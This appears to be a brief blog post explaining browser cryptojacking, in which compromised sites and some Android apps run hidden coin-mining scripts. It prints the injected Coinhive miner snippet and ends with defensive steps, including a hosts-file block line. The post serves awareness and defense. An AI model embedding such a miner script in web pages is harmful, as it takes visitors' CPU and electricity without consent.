Recently, I came across this article which cited that there are almost 2500 sites that are running cryptocurrency mining code in the browsers. These sites are using out-of-date software with known security vulnerabilities. This gives control to attackers to add a script to generate digital currency at the expense of user CPU and electricity.

When a visitor visits these infected sites they would see high CPU usage, close to 100% on their machine.

The Andriod apps that you download from Google Play Store are vulnerable to this too.  Many Andriod apps have been putting coin mining script inside hidden browser windows.

The script that gets embedded to your website is similar to below.

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
    var miner = new CoinHive.User('<site-key>', 'john-doe');
    miner.start();
</script>

The Coinhive on its website, says it provides a way to “Monetize Your Business With Your Users’ CPU Power“. I find this scary.

What you can do to protect yourself

To protect your PC from using your CPU to mine crypto-currency you can install coin-hive blocker chrome extension.

You can also update your hosts file to block coinhive.com or other similar sites. On Windows, hosts is present at %SystemRoot%\System32\drivers\etc\hosts.  To block the domain, open the hosts file in admin mode and add below line:

127.0.0.1 coinhive.com

Stay safe. 🙂